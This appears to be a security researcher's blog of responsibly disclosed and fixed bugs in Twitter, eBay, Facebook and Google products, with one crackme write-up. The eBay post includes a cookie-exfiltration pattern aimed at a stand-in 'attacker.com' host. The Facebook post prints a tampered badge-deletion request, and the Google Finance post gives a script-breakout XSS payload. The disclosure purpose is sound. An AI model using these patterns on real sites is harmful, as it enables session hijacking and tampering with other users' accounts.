Pages

Tuesday, May 8, 2012

Twitter Vulnerability Potential XSS Worm!!! another hero?

Twitter is one of the leading social networking and information sharing system these days.
I have recently discovered(and reported) a XSS vulnerability that if not reported could lead to something similar to "HyHack is my hero"  ;).

For whoever of you who did not know, Twitter Implemented a feature called "Lists", this feature lets any user  the ability of adding anyone, without any terms or relation to the "follow" mechanism (they don't have to follow the attacker and vice versa)*, to his malicious XSSed list.

The reason of this being so High Risk stored XSS vulnerability, is that the attack potentially triggered on anyone who entered the attacker's profile "Lists" using a mobile. after a victim got infected, the attack triggers again and infect anyone who will view the victim's "Lists" and anybody who will view theirs and so on... (only victims that will use a mobile will get infected! reminds you of something? )

*I did not test if a user can add a protected (locked) people to his lists.  any comment on this will be appreciated.

PoC Picture watching the victim's profile:

The effect of this XSS is ONLY on victims that use twitter on Mobile!
I most say the lists feature was not fully implemented in the browser at the time I was testing, so most of my testing performed on the "Me" tab.
Twitter did a great job resolving this vulnerability very quickly (~Day after my report), and placed my name in the Twitter Security Whitehats page(2012) later on.
I would like to thank Twitter for their work and for giving me the opportunity to report a responsible disclosure and help keeping Twitter Users safe.
Posted by [Ben Hayak] at 10:02 PM 0 comments
Labels: , ,

Sunday, May 6, 2012

eBay Security 2011 & 2012 Wide Security Vulnerabilities

eBay has different websites for different countries, As a result of a wrong implementation of some common feature in eBay websites, I've discovered a wide vulnerability that makes all of eBay's users vulnerable and at risk of being hacked!


2012 - XSS Wide Vulnerability 

The payload was injected into a script tag,
bypassing browser's anti-xss filters, and with the ability of full session hijacking and
hacking into eBay's users.



This Time eBay did a great job fixing this vulnerability.


2011 - Vulnerability in all eBay Stores
in 2011 I've Discovered a vulnerability which was quite simple to exploit since user input passed through character blacklist which until my report didn't sanitized input correctly.



2011 - Interesting Wrong Fix - 


Bypass: Single Parameter Splitting Injection XSS (alert isn't the goal!) 

After my report to the manager of eBay security team, eBay came up with a fix.
this fix contained a server side update to the character blacklist, this time they made it so it will replace the "plus(+)(%2B)" sign and occurrences of "Double Slash(//)" with nothing("") in addition to the filtering of "Brackets (<>)" ,Limiting the parameter's allowed lenght and other forbidden characters.

So, alert? prompt?? could you steal a cookie with alert? can you do it without generating a request to your domain?
A request to the attacker's web listener would normally(there are some techniques to evade that, this bypass comes to show how to deal with a normal real situation) require the use of double slash "plus" sign and long payload.  i.e 'http://attacker.com/?s='+document.____  so it may seem like a partial but anti-session hijacking fix.
After working on this filtering I came up with a modified payload which could be used to bypass the filtering and generate a requests to an attacker's website with the user's sensitive web elements/objects! (including cookie!), then I made a video of full-session hijacking.
the reason I am posting about this issue is the interesting vector of my bypass.
Enjoy watching:



eBay did and still doing a great job as they take great care for security, I thank them for that.
I am pleased I could help eBay's security team making eBay's users and customers a bit more secure.

For all of my reports (2011-2012) and security assistance to eBay, eBay gave their special appreciation ;)
Posted by [Ben Hayak] at 2:46 PM 0 comments
Labels: , ,

Thursday, August 25, 2011

Uncrackable? - Exceptional Cracking

Okay, I've been waiting for a long time for a case worth posting in my blog. I ran into this one during a search for much less interesting, standard challenges, for teaching newbies the basics of RE.
This one is a bit beyond what you guys are used to, and I really want you to give it a try before you read this. If you crack it quickly then don't bother reading, if you already have 3 letters of the serial and you're stuck you should start reading from phrase F.

I won't teach you how to use a debugger or how to trace the relevant RE chunk of code, there's tons of tutorials that'd do just that. You should consider this as a case study, what's interesting is the case itself and my focus would be accordingly.
Background:
One of the reasons I chose this crackme is because it "forces" u to focus on discovering the serial itself and not just 'patch & trash' waste of time, additionally the serial discovery is special.
Goal:
The goal is to find the serial key. I'll show the entire process including the method I used and why I chose to use that method, and I'll hand over the correct serial.
CrackMe Download Mirrors:
Mirror 1
Mirror 2


Download the Full PDF Article


Posted by [Ben Hayak] at 12:15 PM 0 comments
Labels: ,

Friday, April 8, 2011

Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)

These days Facebook is one of the heaviest engine of advertising, many companies use Facebook to promote their products and even hire people to deal just with that.


I found an attack vector that can be used by any hacker to delete badges/ads from people's/companies's accounts which will cause a damage to every blog/other website
because a new bages will have a new "bid" so every website will drop the old badge.

This issue effects the Badges feature 
As for: 
Badges Home
Profile Badges
Like Badges
Photo Badges
Page Badges

Vulnerability Details:
A user uses the badges feature to share on blogger or any other place
an attacker see the bage in some website/blog:
<img src="http://badge.facebook.com/badge/1403380007.3098.1711802846.png" width="336" height="84" style="border: 0px;">
Analyzing the Picture's name:
The first number 1403380007 is the Victim's facebook owner ID
(it's easy to get this id using a simple search in facebook)
Now the middle number: 3098 is the bid(badge id) 

Now what the Attacker needs is to capture a deleting badge packet
and manipulate the "bid" and "owner_id"

POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/profile.php?status=new
Origin: http://www.facebook.com
X-SVN-Rev: 349667
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 ....
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mycookie
Content-Length: 137

bid=3098&owner_id=1403380007&post_form_id=073ca00487f1c8fb8903a6ff04ed57be&fb_dtsg=4xsur&lsd&post_form_id_source=AsyncRequest&confirmed=1

Then a successful badge delete will be performed on the victim's account


The Facebook Team Fixed this issue and thanked me by adding my name into the Facebook WhiteHats thank you list : Facebook Security WhiteHats

Best Regards,
Ben Hayak 
Posted by [Ben Hayak] at 2:13 PM 3 comments
Labels: , ,

Saturday, April 2, 2011

Google Security Vulnerability Reward Program: Google Adwords Billing poisoning

Overview
Google Adwords Google's Online Advertising service, boost website traffic and sales, was vulnerable to a persistent XSS in the Billing information.

What Had to be done?
                            
The Billing information details was vulnerable to a persistent xss in 5 different fields.
The locations were:
Business name,
Contact name:
both Street Addresses, and City.
This attack was performed by editing the billing information with the right xss payload (no special bypass required).
This XSS is so persistent that it isn't possible even for the administrator to delete the poisoned billing information.


Screen shoot:

This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.
Posted by [Ben Hayak] at 6:56 PM 2 comments
Labels: , ,

Tuesday, March 22, 2011

Google Security Vulnerability Reward Program: Take Control Over Adwords Service!

Overview
Google Adwords Google's Online Advertising service, boost website traffic and sales, was vulnerable to a persistent XSS in the main page Dashboard!

What Had to be done?

Well, here I discovered that the Dashboard page stored the Campaigns and the Ad groups as 'widgets' so I went for it and found it was vulnerable. this attack target could be anyone in the adwords service either 'read only','standard' or 'Administrator' access of course, a member who can edit/add Campaigns can take control over the administrator's account and perform actions with administrator permissions as for example attacker could cause the administrator give the attacker admin access with a malicious javascript payload , without the need of any user interaction from the administrator this attack will trigger as soon as the admin or the other victim, enters the adwords service. this way I could perform session hijacking or take control over the account.

Image triggering the xss on the
Vulnerable location #1 (Campaign):


Vulnerable location #2 (Ad Group):

This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.
Posted by [Ben Hayak] at 9:35 PM 0 comments
Labels: , ,

Sunday, February 27, 2011

Google Security Vulnerability Reward Program: Google Website Optimizer - Stored XSS

Overview
Google WebsiteOptimizer Google's free website testing and optimization tool, missed a very important check when people create their experiments. additionally they made it more easier to exploit.

What Had to be done?

The first step was creating a new experiment I preferred A/B Experiment, then I had an option to add URLs to verify my website is real, as first I inserted some string "BenHayak" for example and pressed continue.
After that screen I had an option to throw the dirty job over to my "Webmaster" - "Your Webmaster will install and do the dirty work for you ;)". Great they give me a link to Google domain validation page with links to BenHayak when I clicked it I noticed it opens a page with only "BenHayak" in the address bar.
Then I made another Experiment filled with many javascript:alert('BenHayak'); and sent this stored xss report alog with recommendation to always check for "http://" in the input.

POC link: Click to trigger the Alert stored xss

Image triggering the xss:


I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.
Posted by [Ben Hayak] at 5:03 PM 1 comments
Labels: , ,

Updates

Well, It's been couple of weeks since I wanted to update the blog with
new vulnerabilities I found in Google products.
But, as for now these bugs aren't fixed yet,
I will publish it soon, after Google will fix the issues.

Best regards,
Ben Hayak
Posted by [Ben Hayak] at 4:22 PM 1 comments

Thursday, February 17, 2011

Google Security Vulnerability Reward Program: Google Bookmarks Stored XSS

Overview
Google Bookmarks lets you create an online bookmark lists. I found this one in the "New Section" function. In order for this XSS to trigger though, the victim had to edit your section.

What Had to be done?

The first step was creating a new bookmark list. After I got that done, I created a New section with Image tag poisioned with XSS payload. The final step was inviting the victim by giving him/her access to my bookmarks list.



This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.
Posted by [Ben Hayak] at 12:35 AM 0 comments
Labels: , ,

Wednesday, February 16, 2011

Google Security Vulnerability Reward Program: Google Finance Stored XSS

Overview
Google Finance lets you create Portfolios. After a few tries I figured a method to 
Trigger XSS using portfolio name.

What Had to be done?

OK, at First I used different payloads in the Portfolio name but nothing triggered,
but after some more research I found that after I create my Portfolio payload and click on one of these Deposit / Withdraw my Portfolio name is inserted into this function
function initPage() {
initVars();
dview = google.finance.portfolio.init({
id: '8',
expected_hash: 'U66jb3VTR2ZPUjgtaXJqaXRZc2s33VNmVWdjfDEyOTc4NzE22NDk',
edition: 'us',
name: '--XSS PAYLOAD--',
currency: 'USD'
}, true,
'/finance/s/7skxqAM7Z8M/chart9.swf?hl=en&gl=us',
true
,
false,
''
);
name: '--XSS PAYLOAD--' , so I inserted this payload as portfolio name: </script><body onload=alert(1)>  there was a filter that when you insert this </script> the server removed everything before the </script>


I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.
Posted by [Ben Hayak] at 4:40 PM 4 comments
Labels: , ,
Subscribe to: Posts (Atom)